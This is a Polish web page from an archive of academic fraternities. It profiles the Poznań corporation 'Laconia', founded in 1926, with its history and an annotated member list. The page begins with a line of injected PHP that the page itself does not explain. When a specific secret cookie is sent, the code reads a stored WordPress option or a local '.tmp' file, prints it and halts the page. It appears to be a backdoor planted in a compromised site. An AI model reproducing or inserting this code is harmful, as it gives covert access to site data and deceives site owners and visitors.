if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Laconia

Dekiel Zdzisława Rembarza. Nazwa:
Korporacja Akademicka “Laconia” przy Wyższej Szkole Handlowej w Poznaniu
Siedziba:
Poznań
Data powstania:
7 XII 1926 r.
Barwy:
zielona - amarantowa - złota
Dewiza:
„Tibi et gloriae Tuae, Patria” (”Dla Ciebie i Twej chwały Ojczyzno”)

Rys historyczny

Herb Laconii.

Laconia została założona dnia 7 XII 1926 r. z inicjatywy grupy studentów Wyższej Szkoły Handlowej: Heliodora Jankiewicza, Stefana Kinowskiego, Wincentego Przywitowskiego, Edwarda Rojka, Alfonsa Rutkowskiego i Jana Witkowskiego. Jej szczególnym celem była praca nad rozwojem gospodarczym Polski, w szczególności w sferze przemysłu i handlu morskiego.

Od dnia 12 XII 1927 r. należała do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 12 XII 1927 r.). Kandydowała pod opieką K! Baltia. Prawa członka rzeczywistego uzyskała dnia 23 III 1929 r.

Szarfa prezydialna Laconii

W marcu 1936 r. wraz z Baltią, Masovią i Gedanią Posnaniensis stworzyła Porozumienie Korporacji Morskich. Dzięki temu współuczestniczyła w organizowaniu “Tygodni Pomorza”, a w tych ramach “Akademii Morskich”.

Karta tytułowa zaproszenia na Wieczór Karnawałowy Laconii, Poznań 1936 r.

W końcu lat 30-tych ukazywały się biuletyny Laconii (do 1939 r. opublikowano dziewięć numerów).

Całkowita ustalona, choć niekompletna imienna lista członków obejmuje 75 nazwisk, w tym pięciu członków honorowych.

W latach powojennych odbywały się w Poznaniu spotkania niewielkiej grupy Lacończyków.

Laconia, Poznań 1936/1937 r.

Lista członków

Poniższa, niekompletna lista członków Laconii obejmuje kilkadziesiąt nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Kazimierz Celichowski, (28 sierpnia 1877 - 15 grudnia 1953), dr inż. chemii, prof. WSH, kierownik stacji doświadczalnej Wielkopolskiej Izby Rolniczej, Filister honorowy Laconii i prezes Koła Filistrów 1936-37, pochowany na Cmentarzu na Jeżycach w Poznaniu
 2. Albin Glabisz, prof. WSH, Filister honorowy Laconii
 3. Kazimierz Kużaj, (1871 - 12 lipca 1932) fundator sztandaru Laconii 1929, Filister honorowy Laconii, pochowany na cmentarzu parafialnym św. Wojciecha w Poznaniu
 4. Zdzisław Orłowski, (10 października 1892 w maj. Zawory - 7 czerwca 1982 w Poznaniu) s. Leonarda, absolwent Gimnazjum w Śremie, od 1914 w armii niemieckiej, powstaniec wielkopolski, m.in. jako dowódca IV Okręgu Wojskowego kierował działaniami powstańczymi na północnej opartej o Noteć linii frontu, żołnierz WP, 1919-21, uczestnik wojny 1920 i III powstania śląskiego, w dwudziestoleciu m.in. właściciel i dyrektor Wielkopolskiego Towarzystwa Węglowego, Filister honorowy Laconii, od marca 1939 prezes Zarządu Głównego Związku Powstańców Wielkopolskich w Poznaniu, w wojnie obronnej w sierpniu 1939 zmobilizowany z przydziałem do Dowództwa Okręgu Korpusu VII w Poznaniu w charakterze kierownika Biura Cenzury, później w PSZ we Francji i Wielkiej Brytanii, w 1947 wrócił do kraju, pracował w spółdzielczości, w 1957 awansowany na podpułkownika, odznaczony m.in. Orderem Virtuti Militari, trzykrotnie Krzyżem Walecznych, Złotym Krzyżem Zasługi, Krzyżem Orderu Polonia Restituta i Krzyżem Niepodległości z mieczami, honorowy obywatel Czarnkowa 1969, pochowany na Cmentarzu w Lubaszu, jego imieniem nazwano Gimnazjum w Lubaszu
 5. Stefan Żardecki, prof. WSH, kurator i Filister honorowy Laconii

Członkowie rzeczywiści
Tadeusz Rembarz, lata 30-te

 1. Zbigniew Andrzejewski, (30 czerwca 1905 w Czerniejewie - 18 kwietnia 1963 w Łodzi) s. Czesława i Olgi z Kotlińskich, brat Bogdana (Posnania), szwagier Jana Witkowskiego (Laconia), w stopniu szeregowego uczestnik wojny polsko-bolszewickiej 25 VIIII - 9 X 1920, absolwent Gimnazjum im. Karola Marcinkowskiego w Poznaniu, student chemii UP oraz Wojskowej Szkoły Inżynierii, założyciel Laconii, wiceprezes sem. let. 1929/30, ppor. rez., zawodowo pracował jako inżynier w zakładach przemysłu motoryzacyjnego w Płocku, Kaliszu i Łodzi, pochowany na Cmentarzu Górczyńskim w Poznaniu [Źródła (poza wskazanymi poniżej spisu członków): relacja Wojciecha Andrzejewskiego]
 2. Kazimierz Biegański, skreślony 1934
 3. Stanisław Bryx, (1905 w Wąbrzeźnie - 7 stycznia 1972 w Wąbrześnie) absolwent Państwowego Gimnazjum Humianistycznego w 1927, student i absolwent WSH 1927-32, czynna służba wosjkowych w batalionie Podchorążych Piechoty nr 7 w Śremie, skarbnik sem. let. 1929/30, po studiach praktykował w Starostwie Powiatowym w Wąbrzeźnie 1933-35, sekretarz Gminy Płużnica 1935-39, w wojnie obronnej 1939 ochotnik w batalionie kadrowym 63 Pułku Piechoty, walczył w Bitwie nad Bzurą i w 30 Pułku PIechoty w obronie Warszawy do kapitulacji, w niewoli niemieckiej w obozach jenieckich, początkowo w Niemczech, a następnie do wyzwolenia w oflagu IIB Woldenberg, po wojnie pracował w administracji państwowej, pochowany na nowym cmentarzu w Wąbrzeźnie
 4. Brunon Buchholz, (26 września 1918 w Essen - 26 stycznia 2015) s. Bronisława i Marty z d. Ratkowskiej, absolwent Gimnazjum Humanistycznego w Chełmży 1936, student Wydziału Prawno-Ekonomicznego UP 1936-39, w 1939 wysiedlony z Grudziądza do powiatu miechowskiego, pracował w młynie handlowym jako magazynier, mgr praw UP 1947, aplikant sędziowski w Chełmyży i Toruniu, sędzia w Toruniu, Gdynii i Gdańsku, od 1967 (?) radca prawny w Stoczni Gdańskiej, pochowany na Cmentarzu Komunalnym w Sopocie

  Lech Bykowski, 1936/1937 r.

 5. Lech Bykowski, (1915 - 19 listopada 1998 w Poznaniu) c. 1936, student i absolwent ekonomii UP

 6. Kazimierz Derenowski, (24 grudnia 1909 w Modelu - 28 września 1936 w Łaniętach w pow. kutnowskim) absolwent Gimnazjum Humanistycznego w Gostyninie 1931, student WSH 1933-36, c. 1934, pośmiertnie przebalotowany na rycerza 30 września 1936, członek Koła Naukowego WSH, Bratniej Pomocy WSH, zmarł na zawał serca (zob. Rafał Sierchuła, Kazimierz Derenowski (1909-1936), rękopis AK)
 7. Eryk Filcer, sekretarz sem. zim. 1927/28 oraz 1929

  Kazimierz Fliciński, 1936/1937 r.

 8. Kazimierz Fliciński, (23 lutego 1914 w Pakości - 3 listopada 2013 w Bydgoszczy) s. Michała i Stanisławy z Kozłowskich, absolwent Gimnazjum im. Mikołaja Kopernika w Bydgoszczy, student i absolwent WSH/AH, c. 1935, sekretarz, członek Zarządu Bratniej Pomocy AH 1938/39, w wojnie obronnej 1939 ranny w Bitwie nad Bzurą, nauczyciel w Technikum Ekonomiczno-Administracyjnym w Bydgoszczy, mjr rez., członek Stowarzszenia Filistrów Poznańskich Korporacji Akademickich w Poznaniu (od 2009 Stowarzyszenia Filistrów Korporacji Akademickich w Poznaniu), odznaczony m.in. Krzyżem Virtuti Militarii, Złotym Krzyżem Zasługi, Krzyżem Kawalerskim OOP, pochowany na cmentaru przy ul. Lotników w Bydgoszczy

  Bogdan Gaworzewski, 1936/1937 r.

 9. Bogdan Gaworzewski, (5 lipca 1914 - 7 maja 1941) zginął w obozie koncentracyjnym Mauthausen

 10. Gustaw Gläser, olderman sem. let. 1929/30
 11. Tadeusz Goliński, wiceprezes sem. let. 1928/29, wiceprezes sem. zim. 1929/30, prezes sem. let. 1929/30

  Wiktor Górny, 1936/1937 r.

 12. Wiktor Górny, (zm. 1939-1945 w Bydgoszczy), sekretarz r.a. 1935/36, prezes sem. zim. 1936/37, obywatel Niemiec, jako żołnierz niemiecki rozstrzelany za niewykonanie rozkazu rozstrzelania Polaków w Bydgoszczy

  Gutowski, 1936/1937 r.

 13. Gutowski,

 14. Mieczysław Herdegen, olderman sem. zim. (po Wincentym Przywitowskim) oraz sem. let. 1930/31
 15. Władysław Jakuszewski, sekretarz 1932, członek Komisji Rewizyjnej Bratniej Pomocy WSH 1933/34
 16. E. Janicki, sekretarz sem. zim. 1931/32
 17. Heliodor Jankiewicz, założyciel Laconii, olderman sem. zim. 1927/28
 18. Ludwik Jankowski,
 19. Olgierd Jankowski, wiceprezes sem. zim. i sem. let. 1930/31, prezes sem. zim. 1931/32

  Gutowski, 1936/1937 r.

 20. Witold Jankowski, ( - ok. 1970) prezes 1934, członek Komisji Rewizyjnej Bratniej Pomocy WSH 1933/34

 21. Tadeusz Janowski, (zm. 1939-1945) olderman 1932, oficer AK, współpracownik Związku Odwetu (”Witaszkowcy”), stracony przez Niemców
 22. Stanisław Jurkowski, sekretarz sem. let. 1934/35, wiceprezes r.a. 1935/36
 23. Stefan Kinowski, założyciel Laconii, prezes 1926, prezes sem. zim. 1927/28, olderman sem. zim. 1929/30

  Piotr Klamecki, 1936/1937 r.

 24. Piotr Klamecki, (1912-1991), sekretarz sem. zim. 1936/37

  Bernard Kobza, 1936/1937 r.

 25. Bernard Kobza,

  Edmund Komorowski, 1936/1937 r.

 26. Edmund (Edward?) Komorowski, wiceprezes sem. zim. 1937/38

 27. Piotr Komorowski, skarbnik PKM 1937/38 i 1938
 28. Piotr Koselnik, założyciel Laconii
 29. Lech Kościesza-Cyfrowicz, olderman 1932/33

  Walerian Kowalewski, 1936/1937 r.

 30. Walerian Kowalewski,

  Leon Kozielski, 1936/1937 r.

 31. Leon Kozielski, skreślony 1938

 32. Feliks Kroll, (1911-1977), sekretarz 1932/33
 33. Stanisław Kubiak, wiceprezes 1934, skreślony 1935

  Władysław Lech, 1936/1937 r.

 34. Władysław Lech,

  Jan Manikowski, 1936/1937 r.

 35. Jan Manikowski,

 36. Witold Manikowski, olderman sem. let. 1938/39 (ostatnie Prezydium przed wojną), dr
 37. Karol Marcinkowski,

  Marian Mazur, 1936/1937 r.

 38. Marian Mazur,

 39. Ewald Monarski, ( - 14 grudnia 1990) wiceprezes 1932

  Jerzy Monarski, 1936/1937 r.

 40. Jerzy Monarski, prezes sem. let. 1938/39 (ostatnie Prezydium przed wojną)

 41. Paweł Monarski, ( - 15 października 1989)

  Kazimierz Napiórkowski, 1936/1937 r.

 42. Kazimierz Napiórkowski, 1911-1992), sekretarz sem. zim. 1937/38, wiceprezes sem. let. 1938/39 (ostatnie Prezydium przed wojną), członek Bratniej Pomocy AH 1938/39

  Aleksander Nowakowski, 1936/1937 r.

 43. Aleksander Nowakowski,

 44. Czesław Olszewski, założyciel Laconii
 45. Zygmunt Pietkiewicz, sekretarz sem. zim. 1930/31
 46. Jerzy Pluciński, ( - 9 lipca 1993)
 47. Alfons Popławski, sekretarz sem. let. 1929/30 oraz sem. zim. 1930/31, prezes 1932/33 (?), prezes Akademickiego Koła Toruńskiego 1930/31 i 1931/32, przewodniczący Komisji Rewizyjnej Bratniej Pomocy Studentów UP 1932/33
 48. Wincenty Przywitowski, założyciel Laconii, wiceprezes sem. zim. 1927/28, olderman sem. zim. 1930/31

  Emanuel Reichelt, 1936/1937 r.

 49. Emanuel Reichelt,

  Tadeusz Rembarz, 1936/1937 r.

 50. Tadeusz Rembarz, (1909-1988) wiceprezes sem. zim. 1936/37, prezes sem. zim. 1937/38

  Zdzisław Rembarz, 1936/1937 r.

 51. Zdzisław Rembarz, (1913 - 26 października 1995 w Poznaniu) wiceprezes, prezes sem. let. 1933/34, olderman 1935/36, sem. zim. 1936/37, sem. zim. 1937/38, członek Sądu Koleżeńskiego Bratniej Pomocy WSH 1933/34, przewodniczący Komisji Rewizyjnej Stowarzyszenia Filistrów Poznańskich Korporacji Akademickich 1991-94

 52. Edward Rojek, założyciel Laconii, sekretarz sem. zim. 1927/28,
 53. Michał Ropuszyński, c. 1934 (?), skreślony 1935

  Stanisław Roskosz, prawd. 1935/36 r.

 54. Stanisław Roskosz, (12 kwietnia 1915 w Tarnopolu - 11 grudnia 1972 w Krakowie) s. Tomasza (nauczyciela) i Marii z Kulikowskich (nauczycielki), uczeń gimnazjów w Rogoźnie i Zakopanem, absolwent Gimnazjum im. A. Mickiewicza w Poznaniu 1935, student WSH 1935-38, działacz narodowy, redaktor “Wielkopolanina” 1938-39, dziennika “Orędownik”, w czasie wojny działacz “Ojczyzny”, aresztowany w grudniu 1939 przez gestapo, więziony w Forcie VII w Poznaniu, uciekł z transportu i przedostał się do Generalnej Guberni, kontynuował działalność w “Ojczyźnie” w Krakowie i Warszawie, sekretarz Sekcji Zachodniej Departamentu Informacji i Prasy Delegatury Rządu oraz w Sekcji Informacji i Propagandy, w czasie powstania warszawskiego redagował “Serwis dla prasy i radia” wydawany przez Deparament Informacji oraz pismo “Z pierwszej linii frontu” kolportowane w schronach i piwnicach, po upadku powstania więziony obozie przejściowym w Spellen na granicy niemiecko-belgijskiej, z którego uciekł, po wojnie m.in. kierownik krakowskiego oddziału Zachodniej Agencji Prasowej w Poznaniu 1945-46, kierownik krakowskiego oddziału “Słowa Powszechnego” 1947, oskarżony o kontynuowanie działalności z byłą Delegaturą Rządu i więziony przez komunistów 1947-53, pracownik i sekretarz redakcji “Tygodnika Powszechnego” 1953-56 (po objęciu przez PAX), kierował krakowskim oddziałem “Słowa Powszechnego 1956-58, redaktor “Kierunków” 1958-61, kierownik oddziału krakowskiego Zachodniej Agencji Prasowej 1956-66, przedstawiciel agencji Interpress na Kraków 1967-70, kierownik krakowskiej delegatury PIW 1970-72, pochowany na Cmentarzu Rakowickim w Krakowie (zob. szerzej Włodzimierz Wnuk, Roskosz Stanisław Juliusz, (w:) Polski Słownik Biograficzny, t. 32, s. 97-98)

  Alfons Rutkowski, 1929 r.

 55. Alfons Rutkowski, (1907 - 30 listopada 1992) student i absolwent ekonomii WSH, założyciel Laconii, prezes sem. let. 1930/31

  Franciszek Rzemyk, 1936/1937 r.

 56. Franciszek Rzemyk, skreślony 1936

 57. Tadeusz Schmidt, sekretarz sem. let. 1928/29
 58. Bogdan Sobiesiński, sekretarz sem. let. 1938/39 (ostatnie Prezydium przed wojną)

  Klemens Staszewski, 1936/1937 r.

 59. Klemens Staszewski,

  Leon Stawicki, 1936/1937 r.

 60. Leon Stawicki, ( - przed 1990)

 61. Albin Szwarc, sekretarz sem. let. 1933/34 oraz sem. let. 1934/35, prezes r.a. 1935/36
 62. Tadeusz Szypowski, olderman sem. zim. 1927/28 oraz 1929
 63. Brunon Teidelt, skreślony 1934

  Florian Wiśniewski, 1929 r.

 64. Florian Wiśniewski,

  Jan Witkowski, 1929 r.

 65. Jan Witkowski, (14 czerwca 1907 w Jeżewie - 4 stycznia 1996 w Poznaniu) s. Jana i Marty, szwagier Bohdana Andrzejewskiego (Posnania) i Zbigniewa Andrzejewskiego (Laconia), absolwent Gimnazjum w Nowem nad Wisłą, student i absolwent WSH, założyciel Laconii, wiceprezes, prezes sem. let. 1928/29, sem. zim. 1929/30, sem. zim. 1930/31 oraz 1932, od 1926 do początku lat 60-tych właściciel Domu Filatelistycznego - Jan Witkowski, działacz filatelistyczny, organizator wystaw międzynarodowych, członek sądów konkursowych, wiceprezes Międzynarodowego Związku Dziennikarzy Filatelistycznych, sekretarz Międzynarodowego Komitetu Wystaw Filatelistycznych Miast Targowych INTERMESS, opiekun szkolnych kół filatelistycznych, członek Zarządu 1991-94 oraz 1994-96 Stowarzyszenia Filistrów Poznańskich Korporacji Akademickich, pochowany na Cmentarzu Górczyńskim w Poznaniu

  [Źródła (poza wskazanymi poniżej spisu członków): Encyklopedia Filatelistyki, Warszawa 1993, s. 605; relacja Wojciecha Andrzejewskiego]

  Aleksander Wittchen, 1936/1937 r.

 66. Aleksander Wittchen, (6 stycznia 1913 - 5 lutego 1938 w Kamionnie) absolwent Miejskiego Gimnazjum Koedukacyjnego w Międzychodzie (matura 1934), student WSH, zmarł na zapalenie opon mózgowych, pochowany na Cmentarzu w Kamionnie

 67. Bernard Wittchen, (1910-1991), wiceprezes 1932/33
 68. Stanisław Wiwatowski, ( - po 1991) sekretarz sem. zim. 1929/30
 69. Hieronim Wojciechowski, (zm. 1939-1945), zginął w obozie koncentracyjnym
 70. Maksymilian Wojciechowski, (?) (10 października 1912 - po 1992) mgr ekonomii, prof. gimnazjalny, członek Stowarzyszenia Filistrów Poznańskich Korporacji Akademickich

Herb Laconii.

Listę członków opracowano na podstawie:

1) K. A. Tyszka, Lista członków Polskiej Korporacji Akademickiej Laconia (Poznań), (w:) Polskie Korporacje Akademickie 1997, nr 14, s. 120 i n.,
2) materiałów archiwalnych z Archiwum UAM,
3) fotografii z Archiwum Korporacyjnego,
4) danych encyklopedycznych i słownikowych oraz rozmów z rodzinami zmarłych członków Laconii.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 14 II 2009 r.
Ostatnia zmiana: 22 IX 2017 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja Akademicka “Laconia” przy Wyższej Szkole Handlowej w Poznaniu, (na:) www.archiwumkorporacyjne.pl, stan 22 IX 2017 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }